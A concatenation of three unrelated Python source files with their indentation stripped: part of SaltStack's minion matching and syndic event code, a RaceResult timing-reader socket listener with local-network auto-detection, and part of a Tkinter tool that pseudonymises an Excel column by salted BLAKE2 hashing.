self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local.event.set_event_handler(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = event['data'].get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
log.error('No proxy key found in pillar or opts for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# Check config 'add_proxymodule_to_opts' Remove this in Carbon.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
|
RaceResult.py
|
import socket
import sys
import time
import datetime
import atexit
import subprocess
import threading
import re
import wx
import wx.lib.newevent
import Utils
import Model
from threading import Thread as Process
from queue import Queue, Empty
import JChip
from RaceResultImport import parseTagTime
from Utils import logCall, logException
ChipReaderEvent, EVT_CHIP_READER = JChip.ChipReaderEvent, JChip.EVT_CHIP_READER
readerEventWindow = None
def sendReaderEvent( tagTimes ):
if tagTimes and readerEventWindow:
wx.PostEvent( readerEventWindow, ChipReaderEvent(tagTimes = tagTimes) )
EOL = '\r\n' # RaceResult delimiter
len_EOL = len(EOL)
EOL_encode = EOL.encode()
DEFAULT_PORT = 3601
DEFAULT_HOST = '127.0.0.1' # Port to connect to the RaceResult receiver.
q = None
shutdownQ = None
listener = None
def socketSend( s, message ): # Requires message to be a str. Assumes message is delimited (if required).
if not isinstance(message, bytes):
message = message.encode()
sLen = 0
while sLen < len(message):
sLen += s.send( message[sLen:] )
def socketReadDelimited( s, delimiter=EOL_encode ):
if not isinstance(delimiter, bytes):
delimiter = delimiter.encode()
buffer = s.recv( 4096 )
while not buffer.endswith( delimiter ):
more = s.recv( 4096 )
if more:
buffer += more
else:
break
return buffer.decode() # returns an str.
def AutoDetect( raceResultPort=3601, callback=None ):
''' Search ip addresses adjacent to the computer in an attempt to find the reader. '''
ip = [int(i) for i in Utils.GetDefaultHost().split('.')]
j = 0
for i in range(14):
j = -j if j > 0 else -j + 1
ipTest = list( ip )
ipTest[-1] += j
if not (0 <= ipTest[-1] < 256):
continue
raceResultHost = '.'.join( '{}'.format(v) for v in ipTest )
if callback:
if not callback( '{}:{}'.format(raceResultHost,raceResultPort) ):
return None
try:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.settimeout( 0.5 )
s.connect( (raceResultHost, raceResultPort) )
except Exception as e:
continue
cmd = 'GETSTATUS'
try:
socketSend( s, '{}{}'.format(cmd, EOL) )
except Exception as e:
continue
try:
buffer = socketReadDelimited( s )
except Exception as e:
continue
try:
s.close()
except Exception as e:
pass
if buffer.startswith( '{};'.format(cmd) ):
return raceResultHost
return None
# if we get the same time, make sure we give it a small offset to make it unique, but preserve the order.
tSmall = datetime.timedelta( seconds = 0.000001 )
statusFields = (
'Date', 'Time', 'HasPower', 'Antennas', 'IsInTimingMode', 'FileNumber', 'GPSHasFix',
)
reNonDigit = re.compile( '[^0-9]+' )
def Server( q, shutdownQ, HOST, PORT, startTime ):
global readerEventWindow
if not readerEventWindow:
readerEventWindow = Utils.mainWin
timeoutSecs = 5
delaySecs = 3
readerTime = None
readerComputerTimeDiff = None
s = None
passingsCur = 0
status = None
startOperation = None
def qLog( category, message ):
q.put( (category, message) )
Utils.writeLog( 'RaceResult: {}: {}'.format(category, message) )
def keepGoing():
try:
shutdownQ.get_nowait()
except Empty:
return True
return False
def autoDetectCallback( m ):
qLog( 'autodetect', '{} {}'.format(_('Checking'), m) )
return keepGoing()
def makeCall( s, message ):
cmd = message.split(';', 1)[0]
qLog( 'command', 'sending: {}'.format(message) )
try:
socketSend( s, '{}{}'.format(message,EOL) )
buffer = socketReadDelimited( s )
except Exception as e:
qLog( 'connection', '{}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
raise ValueError
if not buffer.startswith( '{};'.format(cmd) ):
qLog( 'command', '{}: {} "{}"'.format(cmd, _('Unexpected return'), buffer) )
raise ValueError
return buffer
while keepGoing():
if s:
try:
s.shutdown( socket.SHUT_RDWR )
s.close()
except Exception as e:
pass
time.sleep( delaySecs )
#-----------------------------------------------------------------------------------------------------
qLog( 'connection', '{} {}:{}'.format(_('Attempting to connect to RaceResult reader at'), HOST, PORT) )
try:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.settimeout( timeoutSecs )
s.connect( (HOST, PORT) )
except Exception as e:
qLog( 'connection', '{}: {}'.format(_('Connection to RaceResult reader failed'), e) )
s, status, startOperation = None, None, None
qLog( 'connection', '{}'.format(_('Attempting AutoDetect...')) )
HOST_AUTO = AutoDetect( callback = autoDetectCallback )
if HOST_AUTO:
qLog( 'connection', '{}: {}'.format(_('AutoDetect RaceResult at'), HOST_AUTO) )
HOST = HOST_AUTO
else:
time.sleep( delaySecs )
continue
#-----------------------------------------------------------------------------------------------------
crossMgrMinProtocol = (1,2)
crossMgrMinProtocolStr = '.'.join('{}'.format(p) for p in crossMgrMinProtocol)
try:
buffer = makeCall( s, 'GETPROTOCOL' )
except ValueError as e:
logException( e, sys.exc_info() )
continue
current, minSupported, maxSupported = [f.strip() for f in buffer.strip().split(';')[1:]]
if tuple(int(i) for i in maxSupported.split('.')) < crossMgrMinProtocol:
qLog(
'connection',
'{}. {} >={}. {} {}.'.format(
_("RaceResult requires Firmware Upgrade"),
_("CrossMgr requires PROTOCOL"), crossMgrMinProtocolStr,
_("RaceResult supports"), maxSupported,
)
)
time.sleep( delaySecs )
continue
try:
buffer = makeCall( s, 'SETPROTOCOL;{}'.format(maxSupported) )
except ValueError:
continue
qLog( 'status', '{}'.format(buffer.strip()) )
try:
buffer = makeCall( s, 'GETSTATUS' )
except ValueError:
continue
fields = [f.strip() for f in buffer.strip().split(';')]
status = zip( statusFields, fields[1:] )
for name, value in status:
qLog( 'status', '{}: {}'.format(name, value) )
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'STOPOPERATION' )
except ValueError:
continue
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'SETTIME;{}'.format(datetime.datetime.now().strftime('%Y-%m-%d;%H:%M:%S.%f')[:-3]) )
except ValueError:
continue
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'STARTOPERATION' )
except ValueError:
continue
qLog( 'status', '{}'.format(buffer.strip()) )
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'GETTIME' )
except ValueError:
continue
try:
dt = reNonDigit.sub(' ', buffer).strip()
fields[-1] = (fields[-1] + '000000')[:6] # Pad with zeros to convert to microseconds.
readerTime = datetime.datetime( *[int(f) for f in dt.split()] )
readerComputerTimeDiff = datetime.datetime.now() - readerTime
except Exception as e:
qLog( 'command', 'GETTIME: {} "{}" "{}"'.format(_('Unexpected return'), buffer, e) )
continue
while keepGoing():
#-------------------------------------------------------------------------------------------------
cmd = 'PASSINGS'
try:
socketSend( s, '{}{}'.format(cmd, EOL) )
buffer = socketReadDelimited( s )
if buffer.startswith( '{};'.format(cmd) ):
fields = buffer.split(';')
try:
passingsText = fields[1]
except Exception as e:
qLog( 'command', '{}: {} "{}" "{}"'.format(cmd, _('Unexpected return'), buffer, e) )
continue
try:
passingsNew = int( reNonDigit.sub(' ', passingsText).strip() )
except Exception as e:
qLog( 'command', '{}: {} "{}" "{}"'.format(cmd, _('Unexpected return'), buffer, e) )
continue
else:
qLog( 'command', '{}: {} "{}"'.format(cmd, _('Unexpected return'), buffer) )
continue
except Exception as e:
qLog( 'connection', '{}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
break
if passingsNew != passingsCur:
if passingsNew < passingsCur:
passingsCur = 0
tagTimes = []
errors = []
times = set()
passingsCount = passingsNew - passingsCur
#---------------------------------------------------------------------------------------------
cmd = '{}:{}'.format(passingsCur+1, passingsCount) # Add one as the reader counts inclusively.
qLog( 'command', 'sending: {} ({}+{}={} passings)'.format(cmd, passingsCur, passingsCount, passingsNew) )
try:
# Get the passing data.
socketSend( s, '{}{}'.format(cmd, EOL) )
except Exception as e:
qLog( 'connection', 'cmd={}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
break
tagReadSuccess = False
try:
readAllPassings = False
while not readAllPassings:
response = socketReadDelimited( s )
sStart = 0
while 1:
sEnd = response.find( EOL, sStart )
if sEnd < 0:
break
if sEnd == sStart: # An empty passing indicates this is the last one.
readAllPassings = True
break
line = response[sStart:sEnd]
sStart = sEnd + len_EOL
tag, t = parseTagTime(line, passingsCur+len(tagTimes), errors)
if tag is None or t is None:
qLog( 'command', '{}: {} "{}"'.format(cmd, _('Unexpected return'), line) )
continue
t += readerComputerTimeDiff
while t in times: # Ensure no equal times.
t += tSmall
times.add( t )
tagTimes.append( (tag, t) )
tagReadSuccess = True
except Exception as e:
qLog( 'connection', 'cmd={}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
sendReaderEvent( tagTimes )
for tag, t in tagTimes:
q.put( ('data', tag, t) )
passingsCur += len(tagTimes)
if not tagReadSuccess:
break
time.sleep( delaySecs )
# Final cleanup.
cmd = 'STOPOPERATION'
try:
socketSend( s, '{}{}'.format(cmd, EOL) )
buffer = socketReadDelimited( s )
s.shutdown( socket.SHUT_RDWR )
s.close()
except Exception:
pass
def GetData():
data = []
while 1:
try:
data.append( q.get_nowait() )
except (Empty, AttributeError):
break
return data
def StopListener():
global q
global listener
global shutdownQ
# Terminate the server process if it is running.
# Add a number of shutdown commands as we may check a number of times.
if listener:
for i in range(32):
shutdownQ.put( 'shutdown' )
listener.join()
listener = None
# Purge the queues.
while q:
try:
q.get_nowait()
except Empty:
q = None
break
shutdownQ = None
def IsListening():
return listener is not None
def StartListener( startTime=datetime.datetime.now(), HOST=None, PORT=None ):
global q
global shutdownQ
global listener
StopListener()
if Model.race:
HOST = (HOST or Model.race.chipReaderIpAddr)
PORT = (PORT or Model.race.chipReaderPort)
q = Queue()
shutdownQ = Queue()
listener = Process( target = Server, args=(q, shutdownQ, HOST, PORT, startTime) )
listener.name = 'RaceResult Listener'
listener.daemon = True
listener.start()
@atexit.register
def CleanupListener():
global shutdownQ
global listener
if listener and listener.is_alive():
shutdownQ.put( 'shutdown' )
listener.join()
listener = None
if __name__ == '__main__':
def doTest():
try:
StartListener( HOST='127.0.0.1', PORT=DEFAULT_PORT )
count = 0
while 1:
time.sleep( 1 )
sys.stdout.write( '.' )
messages = GetData()
if messages:
sys.stdout.write( '\n' )
for m in messages:
if m[0] == 'data':
count += 1
print( '{}: {}, {}'.format(count, m[1], m[2].time()) )
elif m[0] == 'status':
print( 'status: {}'.format(m[1]) )
elif m[0] == 'passings':
print( 'passings: {}'.format(m[1]) )
elif m[0] == 'command':
print( 'command: {}'.format(m[1]) )
else:
print( 'other: {}, {}'.format(m[0], ', '.join('"{}"'.format(s) for s in m[1:])) )
sys.stdout.flush()
except KeyboardInterrupt:
return
t = threading.Thread( target=doTest )
t.daemon = True
t.run()
time.sleep( 1000000 )
|
PseudoDialogOptions.py
|
from tkinter import ttk
import tkinter as tk
import tkinter.filedialog as fd
import pandas as pd
import threading
import hashlib
import os
import pandas.io.formats.excel
import logging
from logging.handlers import RotatingFileHandler
import pem
from functools import partial
pandas.io.formats.excel.header_style = None
class App(tk.Tk):
def __init__(self):
super().__init__()
self.resizable(False, False)
self.geometry("500x300")
self.title("Simple Pseudonymiser")
self.welcomeLabel = tk.Label(self, text="Welcome to the Simple Pseudonymiser")
self.welcomeLabel.pack(padx=60, pady=10)
self.logger = logging.getLogger()
handler = RotatingFileHandler("pseudo_log.log", maxBytes=10*1024*1024, backupCount=5)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
style = ttk.Style()
style.configure("foreGreen.Label", foreground="green")
style.configure("foreRed.Label", foreground="red")
style.configure("foreOrange.Label", foreground="coral4")
style.configure("button.flat", relief="flat")
self._fileName = tk.StringVar()
self._result = tk.StringVar()
self._salt = tk.StringVar()
self._saltOutput = tk.StringVar()
self._pseudoOutput =tk.StringVar()
self._inputFileName = tk.StringVar()
self._resultOutput = tk.StringVar()
self._pseudoOutput.set("Pseudonymise the file")
self.btn_salt = ttk.Button(self, text="Choose a cert/pem file to generate your salt",
command=self.choose_pem_file, width=100)
self.btn_salt.pack(padx=60, pady=10)
self.btn_file = ttk.Button(self, text="Choose excel file and the select column to pseudo",
command=self.choose_file, state="disabled", width = 100)
self.btn_file.pack(padx=60, pady=10)
#self.menu_label_text = tk.StringVar()
#self.menu_label_text.set("Please choose a column to pseudo")
#self.menu_label = tk.Label(self, textvariable=self.menu_label_text)
#self.menu_label.pack(padx=60, pady=10)
self.options = ['']
self.om_variable = tk.StringVar(self)
self.om = ttk.OptionMenu(self, self.om_variable, *self.options)
self.om.configure(width=60)
self.om.pack(padx=60, pady=10)
self.om['state'] = 'disabled'
self.om_variable.trace("w", self.OptionMenu_SelectionEvent)
self.btn_pseudo = ttk.Button(self, textvariable=self._pseudoOutput,
command=self.pseudonymize_file, state="disabled", width=100)
self.btn_pseudo.pack(padx=60, pady=10)
self.resultLabel = ttk.Label(self, textvariable=self._resultOutput,
width = 400, wraplength=390, font=('Helvetica', 9, 'bold'))
self.resultLabel.configure(style="foreGreen.Label",anchor="center")
self.resultLabel.pack(padx=60, pady=10)
self.processing_bar = ttk.Progressbar(self, orient='horizontal', mode='determinate', length=300)
def report_callback_exception(self, exc, val, tb):
self.logger.error('Error!', val)
self.destroy_unmapped_children(self)
def destroy_unmapped_children(self, parent):
"""
Destroys unmapped windows (empty gray ones which got an error during initialization)
recursively from bottom (root window) to top (last opened window).
"""
children = parent.children.copy()
for index, child in children.items():
if not child.winfo_ismapped():
parent.children.pop(index).destroy()
else:
self.destroy_unmapped_children(child)
def choose_salt_file(self):
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("Text File", "*.txt"),)
filepath = fd.askopenfilename(title="Open PEM file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
self._salt.set(filepath)
with open(self._salt.get()) as f:
self._salt.set(f.readline())
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_pem_file(self):
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("pem file", "*.pem"),("cert file", "*.cert"),("crt file", "*.crt"))
filepath = fd.askopenfilename(title="Open pem or cert file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
certs = pem.parse_file(filepath)
self._salt.set(filepath)
self._salt.set(certs[0].sha1_hexdigest)
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_file(self):
self.btn_pseudo['state'] = 'disabled'
self._fileName.set("")
file_types = (("xlsx", "*.xlsx"),)
filepath = fd.askopenfilename(title="Open file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
self._fileName.set(filepath)
self._inputFileName.set(os.path.basename(self._fileName.get()))
self.btn_pseudo['state'] = 'normal'
self._resultOutput.set("")
self.logger.info('Data File Loaded '+self._fileName.get())
temp_name = self.get_file_display_name(self._fileName.get())
# self._pseudoOutput.set("Pseudonymise the column "+self.om_variable.get())
first_row = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8', nrows=1)
self.options = list(first_row)
self.update_option_menu()
self.om['state'] = 'normal'
self.om_variable.set(self.options[0])
self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
def update_option_menu(self):
menu = self.om["menu"]
menu.delete(0, "end")
for string in self.options:
menu.add_command(label=string,
command=lambda value=string: self.om_variable.set(value))
def OptionMenu_SelectionEvent(self, *args):
self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
pass
def pseudo(self, x):
sentence = str(x) + self._salt.get()
return str(hashlib.blake2s(sentence.encode('utf-8')).hexdigest())
def pseudonymize_file(self):
self.logger.info('Starting Pseudo: ' + self._fileName.get())
self.processing_bar.pack(padx=60, pady=10)
self.processing_bar.start(1000)
t = threading.Thread(target=self.pseudonymize_file_callback)
t.start()
def kill_progress(self):
self.processing_bar.stop()
self.processing_bar.pack_forget()
def get_extension(self, filename):
filename, file_extension = os.path.splitext(filename)
return file_extension if file_extension else None
def get_file_display_name(self, filename):
temp_name = os.path.basename(filename);
return temp_name[:15] + ('..' + self.get_extension(temp_name) if len(temp_name) > 15 else '')
def pseudonymize_file_callback(self):
try:
self.btn_pseudo['state'] = 'disabled'
self.btn_file['state'] = 'disabled'
self.btn_salt['state'] = 'disabled'
temp_name = self.get_file_display_name(self._fileName.get())
self.resultLabel.config(style="foreOrange.Label")
self._resultOutput.set(temp_name + " is being loaded")
self.update()
df = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8')
df.columns = df.columns.str.lower()
#if 'identifier' not in df.columns:
# self.resultLabel.config(style="foreRed.Label")
# self._resultOutput.set("No 'identifier' column exists in file!")
# self.btn_pseudo['state'] = 'normal'
# self.btn_file['state'] = 'normal'
# self.btn_salt['state'] = 'normal'
# self.kill_progress()
#else:
temp_name = str(self._fileName.get())
temp_name = temp_name.replace(".xlsx", "_psuedo.xlsx")
new_name = temp_name
